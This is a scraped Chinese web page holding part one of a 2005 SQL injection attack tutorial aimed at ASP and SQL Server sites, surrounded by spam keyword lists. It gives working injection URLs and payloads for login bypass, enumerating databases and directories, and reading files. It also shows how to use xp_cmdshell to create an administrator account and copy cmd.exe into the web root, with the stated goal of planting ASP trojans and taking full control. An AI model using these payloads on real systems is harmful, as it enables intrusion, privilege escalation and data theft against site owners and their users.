国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

什么是注入式攻擊(1)
2005-12-18   

隨著B/S模式應用開發的發展,使用這種模式編寫應用程序的程序員也越來越多。但是由于程序員的水平及經驗也參差不齊,相當大一部分程序員在編寫代碼的時候,沒有對用戶輸入數據的合法性進行判斷,使應用程序存在安全隱患。用戶可以提交一段數據庫查詢代碼,根
據程序返回的結果,獲得某些他想得知的數據,這就是所謂的SQL Injection,即SQL注入。
SQL注入是從正常的WWW端口訪問,而且表面看起來跟一般的Web頁面訪問沒什么區別,所以目前市面的防火墻都不會對SQL注入發出警報,如果管理員沒查看IIS日志的習慣,可能被入侵很長時間都不會發覺。但是,SQL注入的手法相當靈活,在注入的時候會碰到很多意外的情況。能不能根據具體情況進行分析,構造巧妙的SQL語句,從而成功獲取想要的數據。
據統計,網站用ASP+Access或SQLServer的占70%以上,PHP+MySQ占L20%,其他的不足10%。在本文,以SQL-SERVER+ASP例說明SQL注入的原理、方法與過程。(PHP注入的文章由NB聯盟的另一位朋友zwell撰寫的有關文章)
SQL注入攻擊的總體思路是:
l 發現SQL注入位置;
l 判斷后臺數據庫類型;
l 確定XP_CMDSHELL可執行情況
l 發現WEB虛擬目錄
l 上傳ASP木馬;
l 得到管理員權限;
一、SQL注入漏洞的判斷
一般來說,SQL注入一般存在于形如:
為了全面了解動態網頁回答的信息,首選請調整IE的配置。把IE菜單-工具-Internet選項-高級-顯示友好HTTP錯誤信息前面的勾去掉。
為了把問題說明清楚,以下以
1、整型參數的判斷
當輸入的參數YY為整型時,通常abc.asp中SQL語句原貌大致如下:
select * from 表名 where 字段=YY,所以可以用以下步驟測試SQL注入是否存在。
';(附加一個單引號),此時abc.ASP中的SQL語句變成了
select * from 表名 where 字段=YY',abc.asp運行異常;


如果以上三步全面滿足,abc.asp中一定存在SQL注入漏洞。
2、字符串型參數的判斷
當輸入的參數YY為字符串時,通常abc.asp中SQL語句原貌大致如下:
select * from 表名 where 字段='YY',所以可以用以下步驟測試SQL注入是否存在。
';(附加一個單引號),此時abc.ASP中的SQL語句變成了
select * from 表名 where 字段=YY',abc.asp運行異常;
'='1', abc.asp運行正常,而且與
  ③'='2', abc.asp運行異常;
如果以上三步全面滿足,abc.asp中一定存在SQL注入漏洞。
3、特殊情況的處理
有時ASP程序員會在程序員過濾掉單引號等字符,以防止SQL注入。此時可以用以下幾種方法試一試。
①大小定混合法:由于VBS并不區分大小寫,而程序員在過濾時通常要么全部過濾大寫字符串,要么全部過濾小寫字符串,而大小寫混合往往會被忽視。如用SelecT代替select,SELECT等;
②UNICODE法:在IIS中,以UNICODE字符集實現國際化,我們完全可以IE中輸入的字符串化成UNICODE字符串進行輸入。如+ =%2B,空格=%20 等;URLEncode信息參見附件一;
③ASCII碼法:可以把輸入的部分或全部字符全部用ASCII碼代替,如U=chr(85),a=chr(97)等,ASCII信息參見附件二;
二、區分數據庫服務器類型
一般來說,ACCESS與SQL-SERVER是最常用的數據庫服務器,盡管它們都支持T-SQL標準,但還有不同之處,而且不同的數據庫有不同的攻擊方法,必須要區別對待。
1、 利用數據庫服務器的系統變量進行區分
SQL-SERVER有user,db_name()等系統變量,利用這些系統值不僅可以判斷SQL-SERVER,而且還可以得到大量有用信息。如:
and user>0 不僅可以判斷是否是SQL-SERVER,而還可以得到當前連接到數據庫的用戶名

2、利用系統表
ACCESS的系統表是msysobjects,且在WEB環境下沒有訪問權限,而SQL-SERVER的系統表是sysobjects,在WEB環境下有訪問權限。對于以下兩條語句:


若數據庫是SQL-SERVE,則第一條,abc.asp一定運行正常,第二條則異常;若是ACCESS則兩條都會異常。
3、 MSSQL三個關鍵系統表
sysdatabases系統表:Microsoft SQL Server 上的每個數據庫在表中占一行。最初安裝 SQL Server 時,sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 數據庫的項。該表只存儲在 master 數據庫中。 這個表保存在master數據庫中,這個表中保存的是什么信息呢?這個非常重要。他是 保存了所有的庫名,以及庫的ID和一些相關信息。
這里我把對于我們有用的字段名稱和相關說明給大家列出來。name //表示庫的名字。
dbid //表示庫的ID,dbid從1到5是系統的。分別是:master、model、msdb、mssqlweb、tempdb 這五個庫。用select * from master.dbo.sysdatabases 就可以查詢出所有的庫名。
Sysobjects:SQL-SERVER的每個數據庫內都有此系統表,它存放該數據庫內創建的所有對象,如約束、默認值、日志、規則、存儲過程等,每個對象在表中占一行。以下是此系統表的字段名稱和相關說明。
Name,id,xtype,uid,status:分別是對象名,對象ID,對象類型,所有者對象的用戶ID,對象狀態。
對象類型(xtype)。可以是下列對象類型中的一種:
C = CHECK 約束
D = 默認值或 DEFAULT 約束
F = FOREIGN KEY 約束
L = 日志
FN = 標量函數
IF = 內嵌表函數
P = 存儲過程
PK = PRIMARY KEY 約束(類型是 K)
RF = 復制篩選存儲過程
S = 系統表
TF = 表函數
TR = 觸發器
U = 用戶表
UQ = UNIQUE 約束(類型是 K)
V = 視圖
X = 擴展存儲過程
當xtype='U' and status>0代表是用戶建立的表,對象名就是表名,對象ID就是表的ID值。
用: select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0 就可以列出庫ChouYFD中所有的用戶建立的表名。

syscolumns :每個表和視圖中的每列在表中占一行,存儲過程中的每個參數在表中也占一行。該表位于每個數據庫中。主要字段有:
name ,id, colid :分別是字段名稱,表ID號,字段ID號,其中的 ID 是 剛上我們用sysobjects得到的表的ID號。
用: select * from ChouYFD.dbo.syscolumns where id=123456789 得到ChouYFD這個庫中,表的ID是123456789中的所有字段列表。
三、確定XP_CMDSHELL可執行情況
若當前連接數據的帳號具有SA權限,且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行,則整個計算機可以通過以下幾種方法完全控制,以后的所有步驟都可以省
1、
2、
3、"net user aaa bbb /add"-- (master是SQL-SERVER的主數據庫;名中的分號表示SQL-SERVER執行完分號前的語句名,繼續執行其后面的語句;"—"號是注解,表示其后面的所有內容僅為注釋,系統并不執行)可以直接增加操作系統帳戶aaa,密碼為bbb。
4、"net localgroup administrators aaa /add"-- 把剛剛增加的帳戶aaa加到administrators組中。
5、'c:\inetpub\wwwroot\save.db' 則把得到的數據內容全部備份到WEB目錄下,再用HTTP把此文件下載(當然首選要知道WEB虛擬目錄)。
6、通過復制CMD創建UNICODE漏洞
HTTP://xxx.xxx.xxx/abc.asp?p=YY;exe ... dbo.xp_cmdshell "copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe" 便制造了一個UNICODE漏洞,通過此漏洞的利用方法,便完成了對整個計算機的控制(當然首選要知道WEB虛擬目錄)。
四、發現WEB虛擬目錄
只有找到WEB虛擬目錄,才能確定放置ASP木馬的位置,進而得到USER權限。有兩種方法比較有效。
一是根據經驗猜解,一般來說,WEB虛擬目錄是:c:\inetpub\wwwroot; D:\inetpub\wwwroot; E:\inetpub\wwwroot等,而可執行虛擬目錄是:c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts等。
二是遍歷系統的目錄結構,分析結果并發現WEB虛擬目錄;
先創建一個臨時表:temp
HTTP://xxx.xxx.xxx/abc.asp?p=YY;create&n ... mp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
接下來:
(1)我們可以利用xp_availablemedia來獲得當前所有驅動器,并存入temp表中:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert temp ... ter.dbo.xp_availablemedia;--
我們可以通過查詢temp的內容來獲得驅動器列表及相關信息
(2)我們可以利用xp_subdirs獲得子目錄列表,并存入temp表中:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(i ... dbo.xp_subdirs 'c:\';--
(3)我們還可以利用xp_dirtree獲得所有子目錄的目錄樹結構,并寸入temp表中:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
這樣就可以成功的瀏覽到所有的目錄(文件夾)列表:
如果我們需要查看某個文件的內容,可以通過執行xp_cmdsell:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec ... nbsp;'type c:\web\index.asp';--
使用'bulk insert'語法可以將一個文本文件插入到一個臨時表中。如:bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'
瀏覽temp就可以看到index.asp文件的內容了!通過分析各種ASP文件,可以得到大量系統信息,WEB建設與管理信息,甚至可以得到SA帳號的連接密碼。
當然,如果xp_cmshell能夠執行,我們可以用它來完成:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id)&nbs ... cmdshell 'dir c:\';--
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id)&n ... p_cmdshell 'dir c:\ *.asp /s/a';--
通過xp_cmdshell我們可以看到所有想看到的,包括W3svc
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec master.dbo.xp_cmdshe ... ub\AdminScripts\adsutil.vbs enum w3svc'
但是,如果不是SA權限,我們還可以使用
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
注意:
1、以上每完成一項瀏覽后,應刪除TEMP中的所有內容,刪除方法是:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;delete from temp;--
2、瀏覽TEMP表的方法是:(假設TestDB是當前連接的數據庫名)
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top& ... nbsp;TestDB.dbo.temp )>0 得到表TEMP中第一條記錄id字段的值,并與整數進行比較,顯然abc.asp工作異常,但在異常中卻可以發現id字段的值。假設發現的表名是xyz,則
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 id from  ... ere id not in('xyz'))>0 得到表TEMP中第二條記錄id字段的值。
五、上傳ASP木馬
所謂ASP木馬,就是一段有特殊功能的ASP代碼,并放入WEB虛擬目錄的Scripts下,遠程客戶通過IE就可執行它,進而得到系統的USER權限,實現對系統的初步控制。上傳ASP木馬一般有兩種比較有效的方法:
1、利用WEB的遠程管理功能
許多WEB站點,為了維護的方便,都提供了遠程管理的功能;也有不少WEB站點,其內容是對于不同的用戶有不同的訪問權限。為了達到對用戶權限的控制,都有一個網頁,要求用戶名與密碼,只有輸入了正確的值,才能進行下一步的操作,可以實現對WEB的管理,如上傳、下載文件,目錄瀏覽、修改配置等。
因此,若獲取正確的用戶名與密碼,不僅可以上傳ASP木馬,有時甚至能夠直接得到USER權限而瀏覽系統,上一步的"發現WEB虛擬目錄"的復雜操作都可省略。
用戶名及密碼一般存放在一張表中,發現這張表并讀取其中內容便解決了問題。以下給出兩種有效方法。
A、 注入法:
從理論上說,認證網頁中會有型如:
select * from admin where username='XXX' and password='YYY' 的語句,若在正式運行此句之前,沒有進行必要的字符過濾,則很容易實施SQL注入。
如在用戶名文本框內輸入:abc' or 1=1-- 在密碼框內輸入:123 則SQL語句變成:
select * from admin where username='abc' or 1=1 and password='123' 不管用戶輸入任何用戶名與密碼,此語句永遠都能正確執行,用戶輕易騙過系統,獲取合法身份。
B、猜解法:
基本思路是:猜解所有數據庫名稱,猜出庫中的每張表名,分析可能是存放用戶名與密碼的表名,猜出表中的每個字段名,猜出表中的每條記錄內容。
l 猜解所有數據庫名稱
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0 因為 dbid 的值從1到5,是系統用了。所以用戶自己建的一定是從6開始的。并且我們提交了 name>1 (name字段是一個字符型的字段和數字比較會出錯),abc.asp工作異常,可得到第一個數據庫名,同理把DBID分別改成7,8,9,10,11,12...就可得到所有數據庫名。
以下假設得到的數據庫名是TestDB。

共2頁: 1 [2] 下一頁

熱詞搜索:

上一篇:全力打造安全主機保護企業網站安全
下一篇:PGP加密的優越性

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
一区二区不卡在线视频 午夜欧美不卡在 | 久久久久久欧美| 亚洲精品在线二区| 久久久久免费视频| 久久久久久九九九九| 国产欧美丝祙| 亚洲午夜一二三区视频| 欧美激情小视频| 亚洲欧美久久久久一区二区三区| 亚洲第一毛片| 国产精品普通话对白| 欧美日韩成人网| 香蕉久久一区二区不卡无毒影院 | 国产精品久久久一本精品| 国产一区欧美日韩| 黄色成人av| 国产精品永久免费观看| 91久久精品网| 欧美国产精品专区| 欧美日韩不卡| 国产一区二区久久精品| 亚洲激情国产精品| 欧美一级大片在线观看| 国产精品久久国产精品99gif| 国产欧美精品一区| 亚洲日本va午夜在线电影| 亚洲小说区图片区| 欧美韩日亚洲| 樱花yy私人影院亚洲| 午夜日韩av| 欧美日韩在线高清| 亚洲国产高清aⅴ视频| 欧美亚洲系列| 国产精品国产三级国产a| 亚洲国产精品久久久| 久久精品色图| 国产亚洲亚洲| 午夜在线a亚洲v天堂网2018| 欧美日韩国产综合一区二区| 极品日韩av| 免费观看在线综合色| 在线观看欧美日韩国产| 久久免费视频网| 伊人久久大香线蕉综合热线| 欧美中文字幕在线视频| 国产亚洲欧美一区| 久久国产精品99久久久久久老狼 | 欧美激情在线播放| 国产一级一区二区| 欧美一区二区黄色| 国内精品福利| 亚洲一区二区精品在线| 欧美日韩亚洲高清一区二区| 亚洲黄色一区二区三区| 欧美aⅴ99久久黑人专区| 亚洲免费精彩视频| 国产精品mv在线观看| 午夜在线不卡| 精品动漫3d一区二区三区免费| 久久国产一区二区| 今天的高清视频免费播放成人 | 国产精品久久久久秋霞鲁丝| 99视频在线精品国自产拍免费观看| 欧美精品一区二区三区蜜桃 | 久久这里只有精品视频首页| 国产欧美视频一区二区| 久久精品成人一区二区三区| 激情欧美亚洲| 欧美日韩一区二区免费视频| 亚洲在线免费| 亚洲激情第一页| 欧美午夜一区二区福利视频| 久久久无码精品亚洲日韩按摩| 日韩一二三在线视频播| 国产亚洲精品自拍| 国产精品免费看片| 欧美美女操人视频| 欧美在线二区| 亚洲欧美怡红院| 99国产精品国产精品毛片| 一区二区三区在线免费视频| 国产精品爱啪在线线免费观看| 欧美波霸影院| 麻豆成人在线观看| 久久综合图片| 久久婷婷av| 久热国产精品视频| 久久美女艺术照精彩视频福利播放| 亚洲女人av| 欧美一区二区三区在线观看视频 | 欧美日韩一区三区| 欧美另类视频| 欧美日韩免费一区二区三区| 欧美久久久久中文字幕| 欧美视频在线免费看| 国产精品免费一区二区三区在线观看 | 国产有码在线一区二区视频| 国产精品黄色| 国产欧美视频一区二区| 国产日本欧美一区二区| 国产一区二区三区在线观看免费| 国产一区二区黄色| 黄色成人片子| 亚洲精品孕妇| 一区二区精品国产| 午夜在线a亚洲v天堂网2018| 久久久久国产精品人| 欧美高清视频在线播放| 欧美日韩一区二区三区高清| 国产精品日韩在线观看| 激情伊人五月天久久综合| 亚洲精品视频在线播放| 亚洲一级影院| 欧美刺激午夜性久久久久久久| 欧美日韩精品在线观看| 国产精品丝袜白浆摸在线| 精品不卡一区二区三区| 亚洲天堂av电影| 欧美www视频| 国产在线欧美日韩| 中文国产成人精品久久一| 久久久久国产一区二区| 欧美视频第二页| 91久久久一线二线三线品牌| 性欧美videos另类喷潮| 欧美日韩亚洲一区二区三区四区| 黄色亚洲精品| 久久精品1区| 国产精品久久久亚洲一区 | 一区二区在线视频播放| 亚洲一区中文字幕在线观看| 蜜月aⅴ免费一区二区三区| 国产日韩久久| 欧美在线视频在线播放完整版免费观看| 欧美激情一区二区三区在线| 影音先锋久久久| 久久一区国产| 亚洲国产精品一区制服丝袜| 久久久久免费| 国内精品免费午夜毛片| 欧美一区二区视频在线| 国产精品成人v| 午夜在线播放视频欧美| 国产农村妇女精品一区二区| 午夜一区二区三区在线观看| 国产亚洲福利一区| 久久综合久久综合九色| 亚洲精品国产精品乱码不99按摩| 农夫在线精品视频免费观看| 亚洲精品久久久久久久久久久| 欧美国产成人在线| 亚洲婷婷综合久久一本伊一区| 国产精品一区二区三区久久| 久久精品视频播放| 亚洲人成网站777色婷婷| 欧美婷婷久久| 久久久人人人| 亚洲一品av免费观看| 国产一区观看| 欧美精品在线免费播放| 亚洲欧美日韩国产一区二区三区 | 一区二区三区精品| 国产一区二区高清视频| 欧美黑人一区二区三区| 午夜精彩视频在线观看不卡| 在线观看亚洲视频| 国产精品五月天| 欧美高清在线一区| 久久国产欧美| 亚洲一区国产精品| 亚洲精品欧美| 娇妻被交换粗又大又硬视频欧美| 欧美日韩另类一区| 另类国产ts人妖高潮视频| 午夜精品福利在线| 亚洲精品一区二区三区不| 国语精品中文字幕| 国产视频久久| 久久午夜av| 欧美一级淫片播放口| 亚洲一品av免费观看| 在线观看国产精品网站| 欧美日韩一区二区欧美激情| 欧美.com| 美女啪啪无遮挡免费久久网站| 亚洲欧美欧美一区二区三区| 99亚洲伊人久久精品影院红桃| 91久久亚洲| 亚洲国产精品成人| 亚洲国产精品成人综合色在线婷婷| 国产性做久久久久久| 国内自拍一区| 99精品久久久| 国产精品免费久久久久久| 在线视频精品一区| 亚洲视频免费在线| 久久成人这里只有精品| 尹人成人综合网| 亚洲剧情一区二区| 日韩视频久久|